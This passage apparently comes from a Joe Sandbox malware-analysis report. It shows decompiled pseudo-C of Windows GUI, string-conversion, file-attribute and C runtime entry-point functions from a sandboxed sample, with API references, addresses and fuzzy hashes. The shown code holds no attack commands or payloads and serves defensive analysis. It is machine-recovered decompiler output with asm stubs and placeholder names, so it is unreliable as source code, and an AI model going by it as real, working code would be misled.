				_t95 =  *0x439c3c; // 0x1
				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

0x00420085
0x00420086
0x0042008a
0x0042008d
0x00420096
0x0042009c
0x0042009e
0x004200a6
0x004200a9
0x004200ac
0x004200b6
0x004200c4
0x004200c7
0x004200db
0x004200e1
0x004200e4
0x004200e7
0x004200e9
0x004200f1
0x004200f1
0x004200f4
0x00420101
0x004200f6
0x004200f6
0x004200fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004200fa
0x004200eb
0x004200eb
0x004200ef
0x00000000
0x00000000
0x004200ef
0x0042010a
0x0042010b
0x0042010c
0x0042010d
0x0042010e
0x004200c9
0x00000000
0x004200c9
0x004200b8
0x004200bb
0x004200be
0x004200bf
0x004200c0
0x004200c1
0x004200c1
0x00420116
0x00420118
0x0042011b
0x0042011b
0x0042011e
0x00420124
0x00420134
0x00420134
0x0042013a
0x0042013d
0x00420140
0x00420142
0x00420142
0x00420163
0x0042016e
0x00420172
0x00420178
0x00420179
0x0042017a
0x00420182
0x00420183
0x00420187
0x0042018d

APIs

GetStockObject.GDI32(00000000), ref: 00420090

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

GetSystemMetrics.USER32 ref: 004200D6
GetSystemMetrics.USER32 ref: 004200DE
InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB45, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				intOrPtr* _t29;
				int _t30;
				void* _t32;
				signed int _t33;
				int _t35;
				signed short* _t38;
				short* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t46;
				signed char _t50;
				char* _t53;
				char* _t54;

				_t53 = _a8;
				if(_t53 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					_t50 =  *_t53;
					if(_t50 != 0) {
						_t29 = _a20;
						if(_t29 != 0) {
							_t42 =  *_t29;
							_t30 =  *(_t29 + 4);
						} else {
							_t42 =  *0x439eec; // 0x0
							_t30 =  *0x439efc; // 0x0
						}
						if(_t42 != 0) {
							_t54 = _a16;
							if( *_t54 == 0) {
								_t41 =  *0x437100; // 0x43710a
								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
										goto L13;
									}
									L21:
									_t33 = E00406F78();
									 *_t33 = 0x2a;
									return _t33 | 0xffffffff;
								}
								_t46 =  *0x43730c; // 0x1
								if(_a12 >= _t46) {
									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
										if(_t53[1] != 0) {
											goto L19;
										}
										 *_t54 =  *_t54 & 0x00000000;
										goto L21;
									} else {
										L19:
										_t35 =  *0x43730c; // 0x1
										return _t35;
									}
								}
								 *_t54 = _t50;
								_push(0xfffffffe);
								goto L14;
							}
							_t54[1] = _t50;
							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
								 *_t54 = 0;
								goto L21;
							} else {
								 *_t54 = 0;
								goto L19;
							}
						} else {
							_t38 = _a4;
							if(_t38 != 0) {
								 *_t38 = _t50 & 0x000000ff;
							}
							L13:
							_push(1);
							L14:
							_pop(_t32);
							return _t32;
						}
					} else {
						_t39 = _a4;
						if(_t39 != 0) {
							 *_t39 = 0;
						}
						goto L5;
					}
				}
			}

0x0040eb4b
0x0040eb52
0x0040eb69
0x00000000
0x0040eb59
0x0040eb59
0x0040eb5d
0x0040eb70
0x0040eb75
0x0040eb84
0x0040eb86
0x0040eb77
0x0040eb77
0x0040eb7d
0x0040eb7d
0x0040eb8b
0x0040eba0
0x0040eba5
0x0040ebea
0x0040ebf8
0x0040ec50
0x00000000
0x00000000
0x0040ebda
0x0040ebda
0x0040ebdf
0x00000000
0x0040ebe5
0x0040ebfa
0x0040ec03
0x0040ec0e
0x0040ec2f
0x00000000
0x00000000
0x0040ec31
0x00000000
0x0040ebd1
0x0040ebd1
0x0040ebd1
0x00000000
0x0040ebd1
0x0040ec0e
0x0040ec05
0x0040ec07
0x00000000
0x0040ec07
0x0040eba7
0x0040ebb1
0x0040ebd8
0x00000000
0x0040ebcf
0x0040ebcf
0x00000000
0x0040ebcf
0x0040eb8d
0x0040eb8d
0x0040eb92
0x0040eb98
0x0040eb98
0x0040eb9b
0x0040eb9b
0x0040eb9d
0x0040eb9d
0x00000000
0x0040eb9d
0x0040eb5f
0x0040eb5f
0x0040eb64
0x0040eb66
0x0040eb66
0x00000000
0x0040eb64
0x0040eb5d

APIs

MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48

Strings

qC, xrefs: 0040EBEA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: qC
API String ID: 626452242-723977305
Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0, Relevance: 6.1, APIs: 4, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t83;
				signed int _t85;
				void* _t126;
				void* _t128;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				asm("cdq");
				_v12 = _a32 / _a40 + 1;
				E004061D5(E00406204(0));
				_t128 = _t126 + 8;
				_v16 = _v8 * _v12;
				while(_v16 > 0) {
					_t83 = E004061E2();
					asm("cdq");
					_v20 = _t83 % _v8;
					_t85 = E004061E2();
					asm("cdq");
					_v24 = _t85 % _v12;
					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
					asm("cdq");
					if(_v16 % 0xa == 0) {
						E0040381D(_a36);
						_t128 = _t128 + 4;
					}
					_v16 = _v16 - 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

0x004040aa
0x004040ac
0x004040ac
0x004040b6
0x004040bd
0x004040c3
0x004040ca
0x004040d8
0x004040dd
0x004040e7
0x004040ea
0x004040f4
0x004040f9
0x004040fd
0x00404100
0x00404105
0x00404109
0x00404155
0x0040415e
0x00404168
0x0040416e
0x00404173
0x00404173
0x0040417c
0x0040417c
0x004041a9
0x004041b4

APIs

_rand.LIBCMT ref: 004040F4
_rand.LIBCMT ref: 00404100
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: _rand
String ID:
API String ID: 1172538735-0
Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004293D9, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004293D9(void* __ecx) {
				INT* _t43;
				CHAR* _t44;
				CHAR* _t47;
				CHAR* _t65;
				void* _t76;
				void* _t81;
				void* _t83;

				E00406520(E0042A890, _t81);
				_t43 =  *(_t81 + 0x20);
				_t65 = 0;
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
				_t76 = __ecx;
				 *(_t81 - 0x14) = 0;
				 *((intOrPtr*)(_t81 - 0x18)) = 0;
				if(_t43 != 0) {
					L4:
					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
					 *(_t81 + 0x18) = _t44;
					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
					}
					E00413206( *(_t81 - 0x14));
					E00413206(_t65);
					_t47 =  *(_t81 + 0x18);
				} else {
					if( *(_t81 + 0x1c) != 0) {
						 *(_t81 - 4) = 0;
						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
						_t65 = E004131DD( *(_t81 + 0x1c));
						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
						_t43 =  *(_t81 - 0x14);
						 *(_t81 + 0x18) = _t65;
						goto L4;
					} else {
						_t47 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t47;
			}

0x004293de
0x004293e6
0x004293ee
0x004293f2
0x004293f5
0x004293f7
0x004293fa
0x004293fd
0x00429456
0x0042946c
0x00429475
0x00429478
0x00429492
0x004294a8
0x004294a8
0x004294b0
0x004294b6
0x004294bb
0x004293ff
0x00429402
0x0042940f
0x0042941c
0x00429427
0x0042942d
0x0042944b
0x00429450
0x00429453
0x00000000
0x00429404
0x00429406
0x00429406
0x00429402
0x004294c5
0x004294ce

APIs

__EH_prolog.LIBCMT ref: 004293DE
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
GetTextAlign.GDI32(?), ref: 00429481
GetCurrentPositionEx.GDI32(?,?), ref: 00429492

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181F2, Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181F2(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E00406330(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x4181ee
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

0x004181fa
0x00418205
0x00418208
0x00418210
0x0041821c
0x00418222
0x00418225
0x0041822a
0x004182c2
0x004182c4
0x00000000
0x004182c4
0x00418245
0x00418259
0x00000000
0x00418259
0x0041824c
0x00418254
0x00418257
0x0041825d
0x00418264
0x0041826d
0x00418275
0x00000000
0x00000000
0x00418277
0x0041827a
0x0041828a
0x0041829b
0x004182aa
0x004182ac
0x004182b2
0x004182b4
0x004182b4
0x004182ba
0x004182bc
0x004182bf
0x004182bf
0x00000000
0x004182ba
0x00418266
0x00418266
0x00000000
0x00418266
0x00000000

APIs

lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406388, Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x42f100);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x439d04 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x439d00 = _t35;
				 *0x439cfc = _t35 << 8;
				 *0x439cf8 = _t15 >> 0x10;
				if(E0040796F(1) == 0) {
					E004064B5(0x1c);
				}
				if(E00408DEC() == 0) {
					E004064B5(0x10);
				}
				_v8 = 0;
				E0040963B();
				 *0x43b87c = GetCommandLineA();
				 *0x439ce8 = E00409509();
				E004092BC();
				E00409203();
				E00406619();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004091AB();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
				E00406646(_t29);
				_t31 = _v24;
				_t40 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E00409033(_t47, _t56, _t40, _t31);
			}

0x00406388
0x0040638b
0x0040638d
0x00406392
0x0040639d
0x0040639e
0x004063aa
0x004063ab
0x004063ae
0x004063b8
0x004063c0
0x004063c6
0x004063d1
0x004063da
0x004063e9
0x004063ed
0x004063f2
0x004063fa
0x004063fe
0x00406403
0x00406406
0x00406409
0x00406414
0x0040641e
0x00406423
0x00406428
0x0040642d
0x00406432
0x00406439
0x00406444
0x00406447
0x0040644b
0x00406455
0x0040644d
0x0040644d
0x0040644d
0x00406468
0x0040646c
0x00406471
0x00406476
0x00406478
0x00406484

APIs

GetVersion.KERNEL32 ref: 004063AE

Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E

GetCommandLineA.KERNEL32 ref: 0040640E
GetStartupInfoA.KERNEL32(?), ref: 00406439
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C

Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00421DA3, Relevance: 6.1, APIs: 4, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00421DA3() {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t43;
				struct HWND__** _t50;
				void* _t52;

				E00406520(E0042A3D8, _t52);
				_t25 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
				_t50 =  *(_t52 + 0xc);
				_t26 = _t50[2];
				_t43 = _t50[1];
				 *(_t52 - 4) = 0;
				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
						goto L4;
					}
				} else {
					L4:
					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
				}
				if(_t43 == 0) {
					L8:
					_push(0x50);
					_push( *((intOrPtr*)(_t52 - 0x10)));
					_push( &(_t50[4]));
					if(_t50[2] != 0xfffffdf8) {
						E00416D78();
					} else {
						lstrcpynA();
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
					_push(1);
					_pop(0);
				} else {
					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
						goto L8;
					}
				}
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00416AEC(_t52 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return 0;
			}

0x00421da8
0x00421db3
0x00421dbb
0x00421dbe
0x00421dc8
0x00421dcb
0x00421dd0
0x00421dd3
0x00421de0
0x00000000
0x00000000
0x00421deb
0x00421deb
0x00421df2
0x00421df2
0x00421df7
0x00421e23
0x00421e26
0x00421e28
0x00421e2e
0x00421e2f
0x00421e39
0x00421e31
0x00421e31
0x00421e31
0x00421e4e
0x00421e52
0x00421e58
0x00421e5a
0x00421df9
0x00421e0d
0x00421e1e
0x00000000
0x00421e1e
0x00421e0d
0x00421e5b
0x00421e62
0x00421e6f
0x00421e77

APIs

__EH_prolog.LIBCMT ref: 00421DA8
GetDlgCtrlID.USER32 ref: 00421DEC
lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
API String ID: 2888839504-0
Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF2C, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BF2C(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

0x0040bf2c
0x0040bf2c
0x0040bf31
0x0040bf34
0x0040bf38
0x0040bf3d
0x0040bf41
0x0040bfda
0x0040bfda
0x0040bf61
0x0040bf70
0x0040bf72
0x0040bf77
0x00000000
0x0040bf79
0x0040bf79
0x0040bf84
0x0040bf89
0x0040bf8c
0x0040bf8e
0x0040bf91
0x0040bfab
0x00000000
0x0040bfc4
0x0040bfd2
0x0040bfd2
0x0040bfab
0x0040bf77
0x0040bfe2
0x0040bfed

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
